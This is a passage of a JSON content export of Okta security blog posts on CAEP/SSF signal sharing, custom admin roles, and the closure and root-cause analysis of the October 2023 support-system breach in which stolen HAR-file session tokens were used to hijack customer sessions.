allow identity practitioners to configure an exchange of risk signals between IdPs and applications related to user and session risk. The events might still be logged in the SIEM, but CAEP allows for protective controls to swing into action before detective controls kick into gear.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SSF enables real time context with trusted partners, simplifying the security stack into a cohesive service that supports secure access across a broad range of technologies and platforms using Zero Trust security principles.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The main differences are:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enhanced Interoperability and Integration: SSF facilitates direct, real-time communication between various security tools and platforms within an organization’s IT ecosystem, continuously communicating to thwart attackers lateral movement across services. This seamless integration can sometimes be more efficient than the centralized logging and analysis approach of SIEM systems, which may require complex configuration and integration efforts to achieve similar levels of interoperability.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Standardized Signaling: By standardizing the way security signals are shared and interpreted across different systems, SSF can enhance the overall effectiveness of security measures. SIEMs, while powerful for analysis and correlation, might not inherently standardize or streamline the communication protocols between disparate security solutions.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Real-Time Adaptive Response: SSF enables security solutions to respond to threats in real-time by sharing signals about detected threats or anomalies instantly. This can allow for automated, immediate responses such as isolating a compromised endpoint. In contrast, SIEMs might excel in detection and alerting but can be slower to enact automated responses due to their reliance on central processing and analysis\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Scalability and Efficiency: SSF's direct signaling between tools can reduce the complexity and overhead associated with aggregating and processing vast amounts of log data, as is common with SIEM systems. This can be particularly advantageous in highly dynamic or cloud-native environments where the volume and velocity of data can overwhelm traditional SIEM architectures, or require numerous collectors and connectors which incur lag and costs.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cost-Effectiveness: For startups and Small to Medium Enterprise organizations, implementing and maintaining a SIEM solution can be resource-intensive, requiring dedicated hardware, software, training and personnel. In contrast, an SSF approach, leveraging cloud services and APIs for integration and communication, might offer a more cost-effective solution for organizations looking to maximize their security efficiency and budgets.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It’s important to note that SSF and SIEM serve different needs within the cybersecurity ecosystem. In many cases, the most robust security posture would benefit from leveraging both SSF and SIEM capabilities, using SSF to enhance the real-time response and operational efficiency of the security infrastructure, and SIEM to provide deep analytical insights, historical data analysis, and compliance reporting.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How is Okta championing SSF and CAEP interoperability?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recently announced the Okta Secure Identity Commitment with one of the pillars being, Raising the bar for our Industry, and Okta believes in a collaborative approach to security. By actively participating in SSF standardization and demonstrating interoperability with key partners, we aim to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Boost security effectiveness: Sharing enriched threat data across different solutions empowers organizations to detect and respond to threats faster and more effectively.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Simplify security operations: Eliminating vendor lock-in and streamlining data exchange reduces complexity and operational overhead for security teams.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Accelerate innovation: Fostering an open ecosystem encourages innovation and the development of more advanced security solutions.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Some key takeaways to consider when reviewing your identity strategy:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How do you evaluate user risk during sessions beyond initial access?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What challenges exist when correlating threat data across your security stack?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How quickly and proactively can you respond to emerging identity threats?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How do you apply the right authentication method for the data rather than one-for-all and how can you adopt adaptive authentication workflows?\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How open or closed is your identity ecosystem? \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/appsofthefuture\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Do your application vendors support CAEP/SSF\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"?\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-07T20:35:09.141Z","secAuthor":[{"id":"4bd66bb8-bbb2-5ab6-895d-32c670d02166","bio":{"bio":"
Stephen McDermid, CSO EMEA has led and been responsible for several enterprise-wide transformations ranging from National Government transformation projects to ISO27001 and PCI-DSS accreditation across multiple sites. He's taken his hands-on knowledge and expertise and used them to help organizations manage security across a broad range of disciplines and ensure senior stakeholders understand the risks and, more importantly, the opportunities available to their business. Stephen has worked with some of the largest organizations across military, banking, government, and enterprise sectors, to enable business transformation and growth. Stephen spends a lot of time on or near water, not just because of the rain; he holds a powerboat license and loves exploring the West Coast waters of Scotland.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3dK8xXUsNpD0udBFZ9FyRL/c7b20c4103a0b02e73c8167676403f89/Stephen-McDermid.png"},"name":"Stephen McDermid","jobTitle":"Regional CSO, EMEA","slug":"stephen-mcdermid","node_locale":"en"}]},{"slug":"/harfiles","id":"92829d3b-664c-551c-ad39-607b1b4f510b","title":"Okta October 2023 Security Incident Investigation Closure","date":"2024-02-08T12:34:22+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Related Posts: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/october-security-incident-recommended-actions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recommended Actions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - Nov 29, 2023 / \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Root Cause Analysis [RCA]\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - Nov 3, 2023 / \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/10/tracking-unauthorized-access-oktas-support-system\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Incident\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - Oct 20, 2023\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Stroz Friedberg, a leading cybersecurity forensics firm engaged by Okta, has concluded its independent investigation of the October 2023 security incident. The conclusions of Okta’s investigation have not changed, and Stroz Friedberg has confirmed there is no evidence of further malicious activity beyond what was previously determined by Okta. The October 2023 security incident forensic report is now available to our customers and partners. While this completes Okta’s investigation of this incident, putting security first will continue to be a top priority. We will communicate further advancements on our commitment to secure identity for the industry.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"As part of our response, we engaged with law enforcement, notified regulators, published indicators of compromise (IOCs), and provided a customized impact report to affected customers. Along with this report, we shared recommendations to help mitigate possible phishing and social engineering attacks.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Additionally, Okta has taken a number of steps to review and enhance the security of the Okta Help Center. We are also changing how and when access is provisioned to customer administrators as well as that system’s data retention policy.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"While Okta’s production service was not impacted, we continue to strengthen our products and recommend configurations that make our customers more secure. We’ve recently announced features that allow customers to secure their administrative access in an Okta tenant, strengthen session security, and enhance location-based access controls, including:\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"unordered-list\",\"content\":[{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Zero Standing Privileges for Okta Admins: Ensure admin roles are requested, approved, and assigned to authorized users only for the duration that access is needed.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"MFA Required for Protected Actions in Admin Console: Provide an additional layer of protection for critical actions in Okta by requiring step-up authentication for admins to perform high-impact actions.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"In Dynamic Zones, Ability to Detect and Block Requests from Anonymizers to Okta Endpoints: Protect critical assets (e.g, Admin Console, App Dashboard, others) and allow request blocking from specified VPNs, anonymous proxies, and similar.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Customers can now also apply IP binding to Okta products and Admin Console: Invalidate Okta sessions if the source IP changes during the session, which helps prevent session takeover. This is in addition to the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"initial remediation action for binding admin sessions\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"list-item\",\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforce an Allowlisted Network Zone for APIs: Restrict attackers and malware from stealing SSWS tokens, and from replaying them outside of the specified IP range in order to gain unauthorized access.\",\"marks\":[],\"data\":{}}],\"data\":{}}],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is committed to putting security first. We are continuing to invest in and deliver enhancements that secure customers, our products and services, and our corporate systems. While we have closed this investigation, our work is not done. In partnership with our customers and others, we know that together we can raise the bar for security practices in our industry. Look for more developments to be announced in the coming weeks.\",\"marks\":[],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:39:23.677Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies.
\n\nPrior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs.
\n\nBradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6TmzH9CPucdERKO5GNXf0y/9be194da88159d15d0faa88d84c5f70b/okta_062624_David_Bradbury_0819.jpg"},"name":"David Bradbury","jobTitle":"Chief Security Officer","slug":"david-bradbury","node_locale":"en"}]},{"slug":"/articles/2023/09/go-secure-default-custom-admin-roles-it-support-staff","id":"ca7a5ff3-34ad-57a2-9759-b26dbc05dddf","title":"Go “Secure by Default” With Custom Admin Roles for IT support staff","date":"2023-09-14T20:54:01+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"The Takeaway: Creating custom roles for your help desk staff supports a “least privilege” approach.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"In late August, Okta’s Defensive Cyber Operations team \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"outlined a social engineering campaign\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in which a target’s IT support staff - that is, the team responsible for common help desk tasks, were tricked into resetting the authenticators of users with the most privileged roles in an organization.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the many \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"recommendations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" made in response to this event was to constrain the permissions of IT support staff in ways that prevent them from performing operations on highly privileged users. The best way to do this is to create and assign a Custom Admin Role for IT Support staff.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"As the name suggests, Okta’s \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/security/custom-admin-role/custom-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" provides the ability to create customized administrative roles with the least privileges required. These roles can be constrained by what tasks the administrator can perform, and what resources (users, groups, apps, workflows etc) the admin can perform those tasks in.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Custom Admin Roles can subsequently be used to remove all other administrators from the resource set assigned to your IT Support staff.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Detailed instructions are available in the following \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.okta.com/help/s/article/assigning-custom-admin-roles-to-it-support-staff?language=en_US\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Knowledge Based Article\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:39:23.605Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause","id":"fd21c105-f886-5c1a-a66d-80b13dd5e5de","title":"Unauthorized Access to Okta's Support Case Management System: Root Cause and Remediation","date":"2023-11-03T09:08:48+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Executive Summary\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"We offer our apologies to those affected customers, and more broadly to all our customers that trust Okta as their identity provider. We are deeply committed to providing up-to-date information to all our customers.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"On Thursday, October 19, Okta advised customers of a security incident. Having finalized our investigation, we can confirm that from September 28, 2023 to October 17, 2023, a threat actor gained unauthorized access to files inside Okta’s customer support system associated with 134 Okta customers, or less than 1% of Okta customers. Some of these files were HAR files that contained session tokens which could in turn be used for session hijacking attacks. The threat actor was able to use these session tokens to hijack the legitimate Okta sessions of 5 customers, 3 of whom have shared their own response to this event.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"The unauthorized access to Okta’s customer support system leveraged a service account stored in the system itself. This service account was granted permissions to view and update customer support cases. During our investigation into suspicious use of this account, Okta Security identified that an employee had signed-in to their personal Google profile on the Chrome browser of their Okta-managed laptop. The username and password of the service account had been saved into the employee’s personal Google account. The most likely avenue for exposure of this credential is the compromise of the employee’s personal Google account or personal device.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Failure to identify file downloads in customer support vendor logs\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"For a period of 14 days, while actively investigating, Okta did not identify suspicious downloads in our logs. When a user opens and views files attached to a support case, a specific log event type and ID is generated tied to that file. If a user instead navigates directly to the Files tab in the customer support system, as the threat actor did in this attack, they will instead generate an entirely different log event with a different record ID.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s initial investigations focused on access to support cases, and subsequently we assessed the logs linked to those cases. On October 13, 2023, BeyondTrust provided Okta Security a suspicious IP address attributed to the threat actor. With this indicator, we identified the additional file access events associated with the compromised account.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Investigation Timeline\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-09-29 1Password reports suspicious activity to Okta Support.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-09-29 Okta Security begins an investigation, suspecting that 1Password was most likely the victim of malware or a phishing attack.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-09-29 to 2023-10-02 Okta Security meets with 1Password on 9/29, 9/30, 10/1 and 10/2 in an attempt to resolve their support case.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-02 BeyondTrust reports suspicious activity to Okta Support.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-02 to 2023-10-11 Okta Security meets with 1Password and BeyondTrust multiple times from 10/2 to 10/11.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-12 A third customer reports suspicious activity to Okta Support.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-13 BeyondTrust provides Okta Security an indicator of compromise (IP address) associated with the event they reported to Okta Support on 10/2.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-16 Using the supplied IP address, Okta Security identifies a service account associated with previously unobserved events in the customer support system logs.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-17 Okta Security disables the service account and terminates associated sessions.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-17 Okta Security copies and examines all files identified in the customer support system logs that were accessed by the threat actor. 134 Okta customers or less than 1% of Okta customers had a file accessed by the threat actor.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-17 Okta Security revokes the Okta session tokens embedded in the HAR files.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-17 Okta Security investigates whether the threat actor attempted to access customer Okta instances using these files.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-18 Okta Security notifies a fourth Okta customer targeted by the adversary.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-18 Okta Security identified a gap in the logs from the customer support system, missing the final hours that the threat actor had access. A re-run query now returns a complete picture of adversary activity.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-19 Okta Security identifies additional files downloaded by the threat actor that were not previously discovered due to the delay in receiving the logs.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-19 Okta Security revokes the Okta session tokens embedded in the newly discovered HAR files that had been downloaded by the threat actor.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-19 Okta Security identifies Cloudflare as the fifth and final Okta target of the adversary.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-19 Okta alerts all Okta customers with registered security contacts, confirming if they were or were not impacted by the security incident.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-20 Okta publishes public advisory at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/10/tracking-unauthorized-access-oktas-support-system\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://sec.okta.com/articles/2023/10/tracking-unauthorized-access-oktas-support-system\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/harfiles\"},\"content\":[]}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-10-20 to 2023-11-02 Okta is focused on helping all customers, answering their questions and rolling out remediation steps.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-11-02 Okta notifies all Okta customers with registered security contacts of the root cause and remediation steps.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2023-11-03 Okta publishes root cause and remediation steps at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/harfiles\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"https://sec.okta.com/harfiles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Remediation Tasks\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Disabled the compromised service account (Complete)\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta has disabled the service account in the customer support system.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"2. Blocking the use of personal Google profiles with Google Chrome (Complete)\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"Okta has implemented a specific configuration option within Chrome Enterprise that prevents sign-in to Chrome on their Okta-managed laptop using a personal Google profile.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"3. Enhanced monitoring for the customer support system (Complete)\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has deployed additional detection and monitoring rules for the customer support system.\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"4. Binding Okta administrator session tokens based on network location (Complete)\",\"marks\":[],\"data\":{}}],\"data\":{}},{\"nodeType\":\"paragraph\",\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has released session token binding based on network location as a product enhancement to combat the threat of session token theft against Okta administrators. Okta administrators are now forced to re-authenticate if we detect a network change. This feature can be enabled by customers in the early access section of the Okta admin portal.\",\"marks\":[],\"data\":{}}],\"data\":{}}]}"},"summary":null,"updatedAt":"2024-06-07T03:39:23.442Z","secAuthor":[{"id":"87a8e5b7-da9e-56f7-95dc-37bd1aaee0d9","bio":{"bio":"David Bradbury is Chief Security Officer at Okta. As CSO, he leads overall security execution for the organization and his team is responsible for navigating the evolving threat landscape to best protect employees and customers. In addition, he is instrumental in helping Okta’s customers continue to adopt and accelerate Zero Trust security strategies.
\n\nPrior to joining Okta, Bradbury was Senior Vice President and Chief Security Officer at Symantec where he led and had global oversight of all cyber security and physical security programs.
\n\nBradbury has built an international reputation for leading and delivering cybersecurity at scale. He has worked across his native Australia, as well as in the United Kingdom and the United States, leading highly-regarded security teams at some of the world’s largest banks, including ABN AMRO, Barclays, Morgan Stanley and the Commonwealth Bank of Australia. He holds a B.S. in Computer Science from the University of Sydney.
